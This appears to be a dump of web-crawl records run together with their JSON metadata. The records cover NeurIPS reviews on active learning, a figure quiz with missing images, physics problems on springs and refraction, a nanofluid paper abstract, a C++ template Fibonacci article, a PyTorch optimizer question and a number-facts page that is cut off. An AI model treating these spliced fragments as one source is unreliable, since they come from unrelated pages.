This paper first shows that learning non-homogenous halfspaces over the uniform distribution, with active or passive-comparison learning individually, requires poly(1/eps) queries. Similarly, in the RPU setting, passive or active learning individually requires (1/eps)^O(d), comparison-passive learning requires (1/eps), and comparison pool-based learning only uses (d polylog(1/eps)).\n\nStrengths: Overall, I like the results of the paper and I think studying comparison and label active learning for distribution-dependent settings is very valuable. I also like that the paper studies the RPU setting, where the algorithm has to know what it's uncertain about. Here, as mentioned above, you need the power of comparison queries to get to d polylog(1/eps) as opposed to 1/eps^d. This model is not as well studied in modern literature, but it's an important learning model when it comes to robustness learning.\n\nWeaknesses: Don't see a particular weakness.\n\nCorrectness: Seems correct.\n\nClarity: Good\n\nRelation to Prior Work: Yes.\n\nReproducibility: Yes\n\n### Review 4\n\nSummary and Contributions: This paper investigates several scenarios in active learning. Namely, both PAC learning and RPU learning are considered for the model; both pool-based and membership query-based settings are considered for the active learning paradigm; and, both labeling and comparisons are considered for the queries. Several new lower bounds and upper bounds are obtained for the query complexity in those scenarios. Remarkably, it is shown that for comparison queries, a query complexity polynomial in log(1/epsilon) is obtained for both the PAC setting and the RPU setting, under relatively weak assumptions for the distributions. Synthetic experiments are performed for corroborating such results.\n\nStrengths: This is a well-written, well-positioned, and well-motivated paper, with new nontrivial results in active learning. 
Although the proof of the upper bound in the PAC setting (Theorem 3.3) is inspired by , the upper bound in the RPU setting (Theorems 3.7 & 3.8) relies on advanced techniques in high-dimensional geometry (notably the concept of average inference dimension). In essence, this is a very good theoretical contribution.\n\nWeaknesses: I found no real weaknesses.\n\nCorrectness: I am not an expert in high-dimensional geometry or in techniques related to the interesting concept of inference dimension. Yet, as far as I could check, the proofs look correct.\n\nClarity: As mentioned above, this paper is very well-written: all notations and definitions are clearly presented, and Section 4 is particularly useful for understanding the main concepts and tools used in the proofs.\n\nRelation to Prior Work: To the best of my knowledge, the paper is well-positioned with respect to related work, and clearly explains the main improvements obtained for different scenarios.\n\nReproducibility: Yes\n\nAdditional Feedback: As a minor comment, I would suggest mentioning some perspectives for further research, such as active learning with comparison queries in agnostic settings. But a detailed conclusion is already provided in the extended version of the paper." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93040013,"math_prob":0.6792118,"size":11654,"snap":"2023-40-2023-50","text_gpt3_token_len":2452,"char_repetition_ratio":0.14291845,"word_repetition_ratio":0.0150417825,"special_character_ratio":0.20447914,"punctuation_ratio":0.117036335,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96916175,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-30T23:26:05Z\",\"WARC-Record-ID\":\"<urn:uuid:44fcd532-8763-413f-8da4-f38499713deb>\",\"Content-Length\":\"14373\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:837590ea-e71a-43b9-b05c-d8f74ad55cdd>\",\"WARC-Concurrent-To\":\"<urn:uuid:620b48b8-fbb9-4093-8126-9c6503e5cf90>\",\"WARC-IP-Address\":\"198.202.70.94\",\"WARC-Target-URI\":\"https://papers.nips.cc/paper_files/paper/2020/file/4607f7fff0dce694258e1c637512aa9d-Review.html\",\"WARC-Payload-Digest\":\"sha1:FDPBNEIBN7GZEOLSGKZR3W7XIEPSOWX7\",\"WARC-Block-Digest\":\"sha1:QDPESNZFCQA3CSR4WI3VUWZ657KEOVGU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233510730.6_warc_CC-MAIN-20230930213821-20231001003821-00576.warc.gz\"}"}
http://prepare.freshersindia.in/reasoning/questions_answersb215.php?tid=15&typeid=2
[ "Non-Verbal Reasoning - SERIES\n\n1.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n2.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n3.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n4.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n5.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4\n\n6.\n\nSelect a figure from amongst the Answer Figures which will continue the same series as established by the five Problem Figures.", null, "A. 1 B. 2 C. 3 D. 4" ]
[ null, "http://prepare.freshersindia.in/reasoning/images/s1q.png", null, "http://prepare.freshersindia.in/reasoning/images/s2q.png", null, "http://prepare.freshersindia.in/reasoning/images/s3q.png", null, "http://prepare.freshersindia.in/reasoning/images/s4q.png", null, "http://prepare.freshersindia.in/reasoning/images/s5q.png", null, "http://prepare.freshersindia.in/reasoning/images/s6q.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.93592566,"math_prob":0.5162896,"size":933,"snap":"2023-40-2023-50","text_gpt3_token_len":207,"char_repetition_ratio":0.14854683,"word_repetition_ratio":0.6826347,"special_character_ratio":0.24008575,"punctuation_ratio":0.082840234,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9834852,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12],"im_url_duplicate_count":[null,1,null,1,null,1,null,1,null,1,null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-04T17:13:45Z\",\"WARC-Record-ID\":\"<urn:uuid:cd9529f3-effa-4f1e-b689-d0afb0d1c8c4>\",\"Content-Length\":\"31168\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:58139973-7d1f-4282-8699-b04f9c6ecf1e>\",\"WARC-Concurrent-To\":\"<urn:uuid:08a05b57-03c8-42b8-bf20-c902c50db99b>\",\"WARC-IP-Address\":\"51.15.58.31\",\"WARC-Target-URI\":\"http://prepare.freshersindia.in/reasoning/questions_answersb215.php?tid=15&typeid=2\",\"WARC-Payload-Digest\":\"sha1:Q4UJ7X32UW7GEWZRPLICDDG5CUYD5J5S\",\"WARC-Block-Digest\":\"sha1:V5TMRQPB42PDFB5QHUOVBIPOPI4EG7BU\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100531.77_warc_CC-MAIN-20231204151108-20231204181108-00568.warc.gz\"}"}
https://www.doubtnut.com/question-answer-physics/a-mass-is-suspended-separately-by-two-springs-of-spring-constants-k1-and-k2-in-successive-order-the--15600026
[ "# A mass is suspended separately by two springs of spring constants k1 and k2 in successive order. The time periods of oscillations in the two cases are T1 and T2 respectively. If the same mass be suspended by connecting the two springs in parallel, (as shown in figure) then the time period of oscillations is T. The correct relation is", null, "A\n\nT^(-2) = T1^(-2) + T2^(-2)\n\nB\n\nT^2 = T1^2 + T2^2\n\nC\n\nT^(-1) = T1^(-1) + T2^(-1)\n\nD\n\nT = T1 + T2\n\nUpdated on:21/07/2023\nText Solution\nVerified by Experts" ]
[ null, "https://d10lpgp6xz60nq.cloudfront.net/physics_images/ARH_31Y_NEET_PHY_C10_E01_028_Q01.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92685485,"math_prob":0.9398787,"size":3275,"snap":"2023-40-2023-50","text_gpt3_token_len":793,"char_repetition_ratio":0.18587588,"word_repetition_ratio":0.32240438,"special_character_ratio":0.24671756,"punctuation_ratio":0.064714946,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9875806,"pos_list":[0,1,2],"im_url_duplicate_count":[null,1,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-09-25T04:17:07Z\",\"WARC-Record-ID\":\"<urn:uuid:e8d20864-2aad-4e6f-bea2-7bffd2c4b070>\",\"Content-Length\":\"284590\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a3c3e036-73a3-4cd2-8a3b-21652d972452>\",\"WARC-Concurrent-To\":\"<urn:uuid:06d504d0-5ad8-4531-907d-787c776c9c3e>\",\"WARC-IP-Address\":\"99.84.191.108\",\"WARC-Target-URI\":\"https://www.doubtnut.com/question-answer-physics/a-mass-is-suspended-separately-by-two-springs-of-spring-constants-k1-and-k2-in-successive-order-the--15600026\",\"WARC-Payload-Digest\":\"sha1:NQRVI4QG52JRQQQ2WIZMHH6ULPKCLX5E\",\"WARC-Block-Digest\":\"sha1:GMLRT2WOPSR3BUQ2FQDYGO3Z76VHPXWE\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-40/CC-MAIN-2023-40_segments_1695233506676.95_warc_CC-MAIN-20230925015430-20230925045430-00202.warc.gz\"}"}
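The relation asked about in the spring question above can be checked numerically from T = 2π√(m/k) and the parallel combination k = k1 + k2. A minimal sketch; the values of m, k1, and k2 are illustrative assumptions, not from the question:

```python
import math

def period(m, k):
    # Time period of a mass-spring oscillator: T = 2*pi*sqrt(m/k)
    return 2 * math.pi * math.sqrt(m / k)

m, k1, k2 = 0.5, 100.0, 300.0          # illustrative values (assumptions)
T1, T2 = period(m, k1), period(m, k2)
T_parallel = period(m, k1 + k2)        # springs in parallel: k = k1 + k2

# For parallel springs: T^(-2) = T1^(-2) + T2^(-2)
assert math.isclose(T_parallel**-2, T1**-2 + T2**-2)
```

Since the combined stiffness is larger than either spring alone, T_parallel comes out smaller than both T1 and T2, regardless of the values chosen.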
https://yonsei.pure.elsevier.com/en/publications/thermal-instability-in-a-rotating-porous-layer-saturated-by-a-non
[ "# Thermal instability in a rotating porous layer saturated by a non-Newtonian nanofluid with thermal conductivity and viscosity variation\n\nDhananjay Yadav, R. Bhargava, G. S. Agrawal, Nirmal Yadav, Jinho Lee, M. C. Kim\n\nResearch output: Contribution to journal › Article\n\n59 Citations (Scopus)\n\n### Abstract\n\nThe stability of a non-Newtonian nanofluid saturated horizontal rotating porous layer subjected to thermal conductivity and viscosity variation is investigated using linear and nonlinear stability analyses. The model used for the non-Newtonian nanofluid includes the effects of Brownian motion and thermophoresis. The Darcy law for the non-Newtonian nanofluid of the Oldroyd type is used to model the momentum equation. The linear theory is based on the normal mode method, and the criteria for both stationary and oscillatory modes are derived analytically. A weak nonlinear analysis based on the minimal representation of a truncated Fourier series containing only two terms is used to compute the concentration and thermal Nusselt numbers. The results obtained during the analysis are presented graphically.\n\nOriginal language: English\nPages: 425-440\nNumber of pages: 16\nJournal: Microfluidics and Nanofluidics\nVolume: 16\nIssue: 1-2\nDOI: https://doi.org/10.1007/s10404-013-1234-5\nPublication status: Published - 2014 Jan\n\n### All Science Journal Classification (ASJC) codes\n\n• Electronic, Optical and Magnetic Materials\n• Condensed Matter Physics\n• Materials Chemistry" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8118723,"math_prob":0.5818248,"size":3841,"snap":"2019-51-2020-05","text_gpt3_token_len":954,"char_repetition_ratio":0.13057075,"word_repetition_ratio":0.6678766,"special_character_ratio":0.22390002,"punctuation_ratio":0.11402157,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95179635,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-27T22:09:33Z\",\"WARC-Record-ID\":\"<urn:uuid:8280a2b1-e6d2-4a9b-8701-837e99c6a18d>\",\"Content-Length\":\"41030\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:81ef4b20-5c6d-4549-a106-5f3da0872f34>\",\"WARC-Concurrent-To\":\"<urn:uuid:8e7c5f61-6ae8-48f6-bc69-6ac4c7dc24e4>\",\"WARC-IP-Address\":\"52.220.215.79\",\"WARC-Target-URI\":\"https://yonsei.pure.elsevier.com/en/publications/thermal-instability-in-a-rotating-porous-layer-saturated-by-a-non\",\"WARC-Payload-Digest\":\"sha1:EBO3LSP3QTZY6VKDXCOOTI2CWABAQUJG\",\"WARC-Block-Digest\":\"sha1:PMXH7D5IQOK646MTANEQV4AMF6BIQL3F\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-05/CC-MAIN-2020-05_segments_1579251728207.68_warc_CC-MAIN-20200127205148-20200127235148-00196.warc.gz\"}"}
https://articles.emptycrate.com/2008/03/09/c_templates_using_templates_to_generate_the_fibonacci_sequence.html
[ "# EmptyCrate\n\nThe following code demonstrates a method for generating the Fibonacci sequence at compile time. Since the values are computed at compile time, no Fibonacci arithmetic happens at runtime; retrieving a number only walks down the chain of instantiated specializations.\n\nThere is a recursive generation of templated types in this code such that the instantiation of a template: Fib<10> f; generates 11 classes, namely: Fib<0> through Fib<10>.\n\nThe nature of the class generation by the compiler means that previous Fibonacci values are effectively cached, making the compile time go much faster. Therefore, this is pretty much the fastest Fibonacci generator I have seen, even if you include compile time.\n\n``````#include <iostream>\n#include <cstdint>\n#include <cassert>\nusing namespace std;\n\ntemplate<int stage>\nstruct Fib\n{\n//Make this value a constant equal to the (stage-1) + (stage-2) values,\n//which the compiler will generate for us and save in the types of:\n// Fib<stage-1> and Fib<stage-2>. This all works because stage is known at compile\n// time, as all template parameters must be.\nstatic const uint64_t value = Fib<stage-1>::value + Fib<stage-2>::value;\n\nstatic inline uint64_t getValue(int i)\n{\nif (i == stage) // Does the current class hold the given place?\n{\nreturn value; // Return it!\n} else {\nreturn Fib<stage-1>::getValue(i); // Get it from the previous class!\n}\n}\n};\n\ntemplate<> // Template specialization for the 0's case.\nstruct Fib<0>\n{\nstatic const uint64_t value = 1;\n\nstatic inline uint64_t getValue(int i)\n{\nassert(i == 0);\nreturn 1;\n}\n};\n\ntemplate<> // Template specialization for the 1's case\nstruct Fib<1>\n{\nstatic const uint64_t value = 1;\n\nstatic inline uint64_t getValue(int i)\n{\nif (i == 1)\n{\nreturn value;\n} else {\nreturn Fib<0>::getValue(i);\n}\n}\n};\n\nint main(int, char *[])\n{\n//Generate (at compile time) 100 places of the Fib sequence.\n//Then, (at runtime) output the 100 calculated places.\n//Note: a 64 bit int overflows at place 92\nfor (int i = 0; i < 100; ++i)\n{\ncout << \"n:=\" << i << \" => \" << Fib<100>::getValue(i) << endl;\n}\n}\n``````" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.71909624,"math_prob":0.9780144,"size":1963,"snap":"2023-40-2023-50","text_gpt3_token_len":500,"char_repetition_ratio":0.13169985,"word_repetition_ratio":0.10670732,"special_character_ratio":0.30565462,"punctuation_ratio":0.1420765,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9860926,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-01T13:09:13Z\",\"WARC-Record-ID\":\"<urn:uuid:219e841b-913c-4d63-8eef-a9910309d37c>\",\"Content-Length\":\"76448\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:b547766d-a350-4d72-b609-a151bf01ec60>\",\"WARC-Concurrent-To\":\"<urn:uuid:613ee6ae-f028-43a9-a1ec-1838e427d4ee>\",\"WARC-IP-Address\":\"185.199.108.153\",\"WARC-Target-URI\":\"https://articles.emptycrate.com/2008/03/09/c_templates_using_templates_to_generate_the_fibonacci_sequence.html\",\"WARC-Payload-Digest\":\"sha1:YOWX53FYNKSGPXBSUFIRLFDV2MK3RVJM\",\"WARC-Block-Digest\":\"sha1:GRSUSIWLY3ANBOGKOTNQHK2KXLHHEN5Z\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679100287.49_warc_CC-MAIN-20231201120231-20231201150231-00490.warc.gz\"}"}
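For comparison, the compute-once-and-cache behavior that the template instantiation gives the C++ code can be sketched in Python with memoization. This is an illustrative parallel (the use of functools.lru_cache is my choice, not from the post), keeping the same convention fib(0) == fib(1) == 1:

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def fib(n: int) -> int:
    # Same convention as the template code: fib(0) == fib(1) == 1
    if n < 2:
        return 1
    return fib(n - 1) + fib(n - 2)

# Each value is computed once and then cached, mirroring how the compiler
# instantiates each Fib<k> type exactly once.
print(fib(10))  # → 89
```

As with the templates, the cache turns the naive exponential recursion into linear work in n.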
https://byjus.com/question-answer/a-glass-sphere-mu-1-5-of-radius-20-cm-has-a-small-air-bubble/
[ "", null, "", null, "Question\n\nA glass sphere $$(\mu = 1.5)$$ of radius $$20\ cm$$ has a small air bubble $$4\ cm$$ below its center. The sphere is viewed from outside and along a vertical line through the bubble. The apparent depth of the bubble below the surface of the sphere is (in cm):\n\nA\n13.33", null, "", null, "B\n26.67", null, "", null, "C\n15", null, "", null, "D\n30", null, "", null, "Solution\n\nThe correct option is B $$26.67$$\n\nConcept: this is a case of refraction through a curved surface.\n\nFormula used: $$\dfrac{\mu_2}{v}-\dfrac{\mu_1}{u}=\dfrac{\mu_2-\mu_1}{R}$$\n\nGiven: $$\mu_2=1$$, $$\mu_1=1.5$$, $$R=-20$$\n\nObject distance $$=u=-(20+4)=-24$$\n\nHere the apparent depth is the image distance v:\n\n$$\dfrac{1}{v}-\dfrac{1.5}{-24}=\dfrac{1-1.5}{-20}$$\n\n$$\Rightarrow \dfrac{1}{v}=\dfrac{1}{40}-\dfrac{1}{16}=\dfrac{-3}{80}$$\n\n$$\Rightarrow v=-\dfrac{80}{3}=-26.67$$\n\nHence the bubble appears at a depth of $$26.67$$ cm.", null, "Physics" ]
[ null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDQiIGhlaWdodD0iNDQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjAiIGhlaWdodD0iMjAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "https://search-static.byjusweb.com/question-images/toppr_ext/questions/1446054_1158732_ans_bcf78b623c6a4973ab507e26cf4aa75d.png", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAiIGhlaWdodD0iNDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, "data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iNDAiIGhlaWdodD0iNDAiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgdmVyc2lvbj0iMS4xIi8+", null, "data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null, 
"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.92193145,"math_prob":0.9999331,"size":267,"snap":"2022-05-2022-21","text_gpt3_token_len":68,"char_repetition_ratio":0.1444867,"word_repetition_ratio":0.0,"special_character_ratio":0.29962546,"punctuation_ratio":0.0754717,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99994767,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-01-28T02:35:30Z\",\"WARC-Record-ID\":\"<urn:uuid:979a44b6-6b04-4f92-b427-de50695a00c4>\",\"Content-Length\":\"148701\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:a1ff3a42-7771-4685-a22c-bd9e6c24d08b>\",\"WARC-Concurrent-To\":\"<urn:uuid:7dbed65a-9a21-4dc9-872f-2bbf0aa4eb3c>\",\"WARC-IP-Address\":\"162.159.129.41\",\"WARC-Target-URI\":\"https://byjus.com/question-answer/a-glass-sphere-mu-1-5-of-radius-20-cm-has-a-small-air-bubble/\",\"WARC-Payload-Digest\":\"sha1:UG6PT74VF3S4562NZLXILTK4D4EIZ7DA\",\"WARC-Block-Digest\":\"sha1:EINDDPYDQJA7XHFLTYYQKM2EJSKQCYBZ\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-05/CC-MAIN-2022-05_segments_1642320305341.76_warc_CC-MAIN-20220128013529-20220128043529-00487.warc.gz\"}"}
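The refraction computation in the glass-sphere solution above can be reproduced numerically from the single-surface relation μ2/v − μ1/u = (μ2 − μ1)/R, using the same sign conventions as the worked solution:

```python
mu1, mu2 = 1.5, 1.0      # light goes from glass (1.5) into air (1.0)
R = -20.0                # radius of the refracting surface, solution's sign convention
u = -(20.0 + 4.0)        # bubble sits 4 cm below the center of a 20 cm sphere

# mu2/v - mu1/u = (mu2 - mu1)/R  =>  solve for v
v = mu2 / ((mu2 - mu1) / R + mu1 / u)
print(round(v, 2))  # → -26.67
```

The negative sign means the image forms on the object side; its magnitude, 80/3 ≈ 26.67 cm, is the apparent depth, matching option B.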
https://discuss.pytorch.org/t/different-optimisers-in-different-layers/72484
[ "# Different Optimisers In Different Layers\n\nHi,\n\nI am currently looking into hybrid neural networks. I would like to apply a different optimizer to the quantum circuit compared to the classical layers.\n\nThe quantum circuit has classical input and parameters, so it can be optimised by a classical optimiser.\n\nMy network looks like\n\n``````class NeuralNet(nn.Module):\n\n    def __init__(self):\n        super(NeuralNet, self).__init__()\n        self.pre_net = nn.Linear(28*28, 4)\n        self.q_params = nn.Parameter(0.01 * torch.randn(q_depth * 4)) # Quantum circuit parameters\n        self.post_net = nn.Linear(4, 10)\n``````\n\n1.) How can I apply the same optimiser to all layers, but have a different step size for the quantum circuit parameters?\n\n2.) How can I apply a completely different optimiser to the quantum circuit parameters?\n\nReally appreciate the help", null, "" ]
[ null, "https://discuss.pytorch.org/images/emoji/apple/grinning.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.716384,"math_prob":0.89102477,"size":753,"snap":"2022-27-2022-33","text_gpt3_token_len":175,"char_repetition_ratio":0.14285715,"word_repetition_ratio":0.0,"special_character_ratio":0.2430279,"punctuation_ratio":0.15068494,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97771555,"pos_list":[0,1,2],"im_url_duplicate_count":[null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-06-27T04:37:56Z\",\"WARC-Record-ID\":\"<urn:uuid:aa2d9d0a-1e41-4803-9dda-44d8df2bdde8>\",\"Content-Length\":\"17618\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8fe3bf74-c2bd-430b-a7fb-cc1510582803>\",\"WARC-Concurrent-To\":\"<urn:uuid:be14e541-8ed0-4e11-bf9a-ede6c1487a5c>\",\"WARC-IP-Address\":\"159.203.145.104\",\"WARC-Target-URI\":\"https://discuss.pytorch.org/t/different-optimisers-in-different-layers/72484\",\"WARC-Payload-Digest\":\"sha1:73DOOHNKRQ4YCLACAHMSBGBBFDWGV2MZ\",\"WARC-Block-Digest\":\"sha1:4NC4U36RSMWT4WAHFNGQV6HNUA6THS6P\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-27/CC-MAIN-2022-27_segments_1656103328647.18_warc_CC-MAIN-20220627043200-20220627073200-00527.warc.gz\"}"}
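Both questions in the post above map onto standard PyTorch mechanisms: per-parameter-group options on a single optimizer (question 1), and instantiating two independent optimizers and stepping both (question 2). A sketch; q_depth = 6 and all learning rates here are assumptions, not from the post:

```python
import torch
import torch.nn as nn

q_depth = 6  # assumption: depth used by the original post

class NeuralNet(nn.Module):
    def __init__(self):
        super().__init__()
        self.pre_net = nn.Linear(28 * 28, 4)
        self.q_params = nn.Parameter(0.01 * torch.randn(q_depth * 4))
        self.post_net = nn.Linear(4, 10)

net = NeuralNet()
classical = list(net.pre_net.parameters()) + list(net.post_net.parameters())

# 1) One optimizer, different step size for the quantum parameters,
#    via per-parameter-group options; groups without "lr" use the default.
opt = torch.optim.Adam([
    {"params": classical},
    {"params": [net.q_params], "lr": 1e-2},  # quantum circuit gets its own lr
], lr=1e-3)

# 2) Two completely independent optimizers; call .step() on each after backward().
opt_classical = torch.optim.Adam(classical, lr=1e-3)
opt_quantum = torch.optim.SGD([net.q_params], lr=5e-2)
```

With option 2, a single loss.backward() populates gradients for all parameters, after which opt_classical.step() and opt_quantum.step() update their own groups independently.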
https://number.academy/16966
[ "# Number 16966\n\nNumber 16,966 spell 🔊, write in words: sixteen thousand, nine hundred and sixty-six . Ordinal number 16966th is said 🔊 and write: sixteen thousand, nine hundred and sixty-sixth. The meaning of number 16966 in Maths: Is Prime? Factorization and prime factors tree. The square root and cube root of 16966. What is 16966 in computer science, numerology, codes and images, writing and naming in other languages. Other interesting facts related to 16966.\n\n## What is 16,966 in other units\n\nThe decimal (Arabic) number 16966 converted to a Roman number is (X)(V)MCMLXVI. Roman and decimal number conversions.\n\n#### Weight conversion\n\n16966 kilograms (kg) = 37403.2 pounds (lbs)\n16966 pounds (lbs) = 7695.7 kilograms (kg)\n\n#### Length conversion\n\n16966 kilometers (km) equals to 10543 miles (mi).\n16966 miles (mi) equals to 27305 kilometers (km).\n16966 meters (m) equals to 55663 feet (ft).\n16966 feet (ft) equals 5172 meters (m).\n16966 centimeters (cm) equals to 6679.5 inches (in).\n16966 inches (in) equals to 43093.6 centimeters (cm).\n\n#### Temperature conversion\n\n16966° Fahrenheit (°F) equals to 9407.8° Celsius (°C)\n16966° Celsius (°C) equals to 30570.8° Fahrenheit (°F)\n\n#### Time conversion\n\n(hours, minutes, seconds, days, weeks)\n16966 seconds equals to 4 hours, 42 minutes, 46 seconds\n16966 minutes equals to 1 week, 4 days, 18 hours, 46 minutes\n\n### Codes and images of the number 16966\n\nNumber 16966 morse code: .---- -.... ----. -.... -....\nSign language for number 16966:", null, "", null, "", null, "", null, "", null, "Number 16966 in braille:", null, "## Mathematics of no. 
16966\n\n### Multiplications\n\n#### Multiplication table of 16966\n\n16966 multiplied by two equals 33932 (16966 x 2 = 33932).\n16966 multiplied by three equals 50898 (16966 x 3 = 50898).\n16966 multiplied by four equals 67864 (16966 x 4 = 67864).\n16966 multiplied by five equals 84830 (16966 x 5 = 84830).\n16966 multiplied by six equals 101796 (16966 x 6 = 101796).\n16966 multiplied by seven equals 118762 (16966 x 7 = 118762).\n16966 multiplied by eight equals 135728 (16966 x 8 = 135728).\n16966 multiplied by nine equals 152694 (16966 x 9 = 152694).\n\n### Fractions: decimal fraction and common fraction\n\n#### Fraction table of 16966\n\nHalf of 16966 is 8483 (16966 / 2 = 8483).\nOne third of 16966 is 5655,3333 (16966 / 3 = 5655,3333 = 5655 1/3).\nOne quarter of 16966 is 4241,5 (16966 / 4 = 4241,5 = 4241 1/2).\nOne fifth of 16966 is 3393,2 (16966 / 5 = 3393,2 = 3393 1/5).\nOne sixth of 16966 is 2827,6667 (16966 / 6 = 2827,6667 = 2827 2/3).\nOne seventh of 16966 is 2423,7143 (16966 / 7 = 2423,7143 = 2423 5/7).\nOne eighth of 16966 is 2120,75 (16966 / 8 = 2120,75 = 2120 3/4).\nOne ninth of 16966 is 1885,1111 